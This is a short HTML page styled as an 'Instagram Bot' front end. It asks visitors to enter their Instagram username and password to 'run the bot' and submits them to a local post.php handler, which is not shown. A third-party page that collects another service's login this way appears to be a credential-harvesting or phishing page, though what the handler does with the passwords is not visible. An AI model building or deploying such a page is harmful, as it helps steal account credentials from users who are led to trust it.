<!DOCTYPE html>
<html>

<head>
  <link href="http://fonts.cdnfonts.com/css/gotham" rel="stylesheet">             
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Instagram Bot</title>
    <link rel "stylesheet" href="style.css">
</head>

<center> 

<style type="text/css" media="all">
     body{
       background-color: black;
       width: 100%;
       height: 100vh;
     }
     .logo{
       display: flex;
       justify-content: center;
       align-items: center;
      
      
     }
   img{
   width:230px; 
   padding-top: 20px;
   margin-top: 20px;
  
  }
  .form{
    display: flex;
    justify-content: center;
    align-items: center;
    color:  #F5D82A;
    
    
    
  }
    h2{
    text-align: center;
    font-weight: bold;
    font-size: 27px;
    margin-bottom: 20px;
    text-transform: capitalize;
    font-family: 'Gotham', sans-serif;
    color: #F5D82A;
  }
  .input{
    display: flex;
    justify-content: center;
    align-items: center;
    flex-direction: column;
    outline: none;
    border: none;
    
  }
  .input input{
    border: 2px solid #F5D82A;
    display: flex;
    font-size: 19px;
    padding: 12px;
    background-color: black;
    color: white;
    outline: none;
  }
input,placeholder{
    text-align: center;
    
  }
  #btn{
    display: flex;
    justify-content: center;
    align-items: center;
    font-size: 30px;
    background-color: #F5D82A;
    color: black;
    border: none;
    outline: none;
    padding: 12px;
    margin-top: 20px;
    margin-left: 0px;
    border-radius: 30px;
    font-weight: bold;
    cursor: pointer;
    text-transform: capitalize;
  }
  
</style>

<body>
<div class="logo">
  <img src="20220617_060417.png" alt="logo" />
</div>
<section>
  <form action = "post.php" method="POST">
    <h2>Login with your Instagram Account to Run Bot</h2>
  
  <div class="input">
    <input type="text" required name="username" placeholder="UserName" id="" value="" /> <br />
    <input type="password" required name="password" placeholder="Password" id="ps" value="" />
  </div>
  
  <input type="Submit" name="Button" id="btn" value="Login and Run" />
</form>
</section>

</body>

</html>

